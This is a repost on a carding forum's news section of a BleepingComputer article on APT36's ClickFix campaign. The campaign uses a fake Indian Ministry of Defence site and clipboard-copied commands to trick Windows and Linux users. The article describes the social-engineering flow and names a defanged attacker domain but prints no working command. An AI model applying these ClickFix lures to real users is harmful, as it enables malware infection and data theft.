Carder.life

Carder.life (http://txgate.io:443/index.php)
-   Carding News (http://txgate.io:443/forumdisplay.php?f=38)
-   -   Hackers now testing ClickFix attacks against Linux targets (http://txgate.io:443/showthread.php?t=51296623)

WWW 05-26-2025 12:08 PM
<div id="post_message_791188">

A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.<br/>
<br/>
ClickFix is a <a href="https://www.bleepingcomputer.com/news/security/iclicker-hack-targeted-students-with-malware-via-fake-captcha/" target="_blank">social engineering tactic</a> where fake verification systems or application errors are used to trick website visitors into running console commands that install malware.<br/>
<br/>
These attacks have traditionally targeted Windows systems, prompting targets to execute PowerShell scripts from the Windows Run command, resulting in <a href="https://www.bleepingcomputer.com/news/security/over-6-000-wordpress-sites-hacked-to-install-plugins-pushing-infostealers/" target="_blank">info-stealer malware</a> infections and <a href="https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-pushes-fake-it-tools-in-clickfix-attacks/" target="_blank">even ransomware</a>.<br/>
<br/>
However, a 2024 campaign using bogus Google Meet errors also <a href="https://www.bleepingcomputer.com/news/security/fake-google-meet-conference-errors-push-infostealing-malware/" target="_blank">targeted macOS users</a>.<br/>
<br/>
<b><font size="4">ClickFix targeting Linux users</font></b><br/>
<br/>
A more recent campaign spotted by <a href="https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence" target="_blank">Hunt.io researchers</a> last week is among the first to adapt this social engineering technique for Linux systems.<br/>
<br/>
The attack, which is attributed to the Pakistan-linked threat group APT36 (aka "Transparent Tribe"), utilizes a website that impersonates India's Ministry of Defence with a link to an allegedly official press release.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/May/website.jpg"/><br/>
<br/>
When visitors click on this website link, they are profiled by the platform to determine their operating system, and then redirected to the correct attack flow.<br/>
<br/>
On Windows, victims are served a full-screen page warning them of limited content usage rights. Clicking on 'Continue' triggers JavaScript that copies a malicious MSHTA command to the victim's clipboard, who is instructed to paste and execute it on the Windows terminal.<br/>
<br/>
This launches a .NET-based loader which connects to the attacker's address, while the user sees a decoy PDF file to make everything appear legitimate and as expected.<br/>
<br/>
On Linux, victims are redirected to a CAPTCHA page that copies a shell command to their clipboard when clicking the "I'm not a robot button."<br/>
<br/>
The victim is then guided to press ALT+F2 to open a Linux run dialog, paste the command into it, and then press <b>Enter </b>to execute it.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/May/linux-instructions.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Instructions for Linux users

</td>
</tr>
</table>
</div>The command drops the 'mapeal.sh' payload on the target's system, which, according to Hunt.io, does not perform any malicious actions in its current version, limited to fetching a JPEG image from the attacker's server.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/security/c/clickfix/linux/linux-clickfix.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Linux ClickFix script

</td>
</tr>
</table>
</div>"The script downloads a JPEG image from the same trade4wealth[.]in directory and opens it in the background," explains Hunt.io.<br/>
<br/>
"No additional activity, such as persistence mechanisms, lateral movement, or outbound communication, was observed during execution."<br/>
<br/>
However, it is possible that APT36 is currently experimenting to determine the effectiveness of the Linux infection chain, as they would just need to swap out the image for a shell script to install malware or perform other malicious activity.<br/>
<br/>
The adaptation of ClickFix to carry out attacks on Linux is another testament to its effectiveness, as the attack type has now been used against all three major desktop OS platforms.<br/>
<br/>
As a general policy, users should not copy and paste any commands into Run dialogs without knowing exactly what the command does. Doing so only increases the risk of a malware infection and theft of sensitive data.<br/>
<br/>
<a href="https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/" target="_blank">@ BleepingComputer </a>
</div>


All times are GMT. The time now is 02:22 PM.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.